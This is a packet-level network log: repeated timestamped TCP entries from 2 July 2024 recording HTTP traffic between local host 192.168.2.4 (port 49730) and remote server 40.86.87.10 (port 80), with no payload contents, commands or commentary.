Jul 2, 2024 07:31:12.916564941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916575909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916587114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916598082 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.916599035 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916610003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916620016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916630030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916641951 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916641951 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.916641951 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.916650057 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.916651964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916661978 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916673899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916678905 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.916685104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916697025 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916707993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916712046 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.916718960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916731119 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916731119 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.916740894 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.916740894 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.916774988 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.917507887 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917520046 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917531013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917541981 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917551994 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917563915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917570114 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.917574883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917587042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917587996 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.917598963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917604923 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.917609930 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917620897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917628050 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.917632103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917644024 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917653084 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.917654991 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917668104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917678118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917680979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.917689085 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917695999 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.917701006 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.917721033 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.917746067 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.918437004 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918447971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918458939 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918467999 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918478012 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918487072 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918498993 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918498993 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.918509960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918513060 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.918520927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918530941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918534994 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.918541908 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918548107 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.918551922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918562889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918574095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918580055 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.918585062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918596029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918606043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918617010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.918622971 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.918629885 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.918629885 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.918662071 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.976185083 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976216078 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976226091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976279020 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.976303101 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976314068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976322889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976334095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976356030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.976356030 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.976392031 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.976511002 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976521969 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976531029 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976535082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976550102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976562023 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.976588964 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.976702929 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976739883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:12.976775885 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:12.976775885 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.004494905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.004543066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.004551888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.004606009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.004606962 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.004606962 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.004618883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.004627943 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.004654884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.004686117 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.004762888 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.004771948 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.004802942 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.004829884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.004862070 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.033670902 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.033761978 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.033763885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.033775091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.033802986 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.033813953 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.033883095 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.033896923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.033910990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.033919096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.033927917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.033978939 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.033998013 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034043074 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.034069061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034079075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034113884 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.034203053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034213066 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034223080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034233093 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034248114 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.034274101 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.034465075 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034475088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034485102 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034495115 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034499884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034508944 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034513950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034524918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034534931 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.034537077 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034549952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.034569025 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.034585953 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.034868956 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034879923 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.034914017 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.035096884 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035106897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035118103 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035132885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035142899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035147905 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035150051 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.035157919 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035167933 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.035168886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035178900 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035187960 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035188913 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.035197973 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035208941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035214901 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035217047 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.035224915 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035234928 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035234928 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.035248041 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035255909 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.035294056 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.035988092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.035998106 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036007881 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036017895 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036026955 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036036968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036037922 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.036046982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036056042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036067009 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036072016 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036072969 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.036078930 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.036078930 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.036081076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036087036 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036096096 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036106110 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036114931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036119938 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.036125898 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036135912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036143064 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.036144972 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036161900 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.036195993 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.036979914 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036989927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.036999941 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037009954 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037019014 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037029028 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037033081 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.037039042 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037040949 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.037049055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037054062 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037059069 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037062883 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.037062883 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037067890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037072897 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037076950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037081957 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037086010 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037091970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037149906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.037158966 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.037842989 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037853003 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037858963 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037863970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037868023 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037873030 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037883043 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037893057 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.037895918 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037905931 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037915945 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037921906 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.037926912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037938118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037947893 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037949085 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.037960052 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.037975073 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.038002968 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.066999912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067078114 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067087889 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067147970 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067157984 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067163944 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.067167997 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067178011 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067204952 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.067224026 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.067333937 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067343950 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067353964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067368031 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067378044 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.067399979 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.067426920 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.067542076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067552090 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067563057 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067572117 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067585945 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.067588091 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.067604065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.067604065 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.067626953 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.097443104 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.097511053 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.097520113 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.097521067 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.097649097 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.097652912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.097659111 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.097664118 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.097735882 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.124476910 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124500990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124510050 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124516964 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124522924 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124528885 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124597073 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124631882 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124644995 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124736071 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124749899 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124759912 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124771118 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.124805927 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124819040 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124825954 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.124834061 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124845982 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124851942 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.124857903 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.124885082 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.124913931 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.125175953 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.125186920 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.125199080 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.125227928 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.125258923 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.152997971 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153040886 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153052092 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153058052 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153084040 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153103113 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153127909 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153137922 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153148890 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153176069 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153204918 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153330088 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153341055 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153351068 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153361082 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153379917 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153414011 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153522968 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153533936 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153543949 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153556108 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153567076 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153573990 CEST	80	49730	40.86.87.10	192.168.2.4
Jul 2, 2024 07:31:13.153575897 CEST	49730	80	192.168.2.4	40.86.87.10
Jul 2, 2024 07:31:13.153597116 CEST	49730	80	192.168.2.4	40.86.87.10
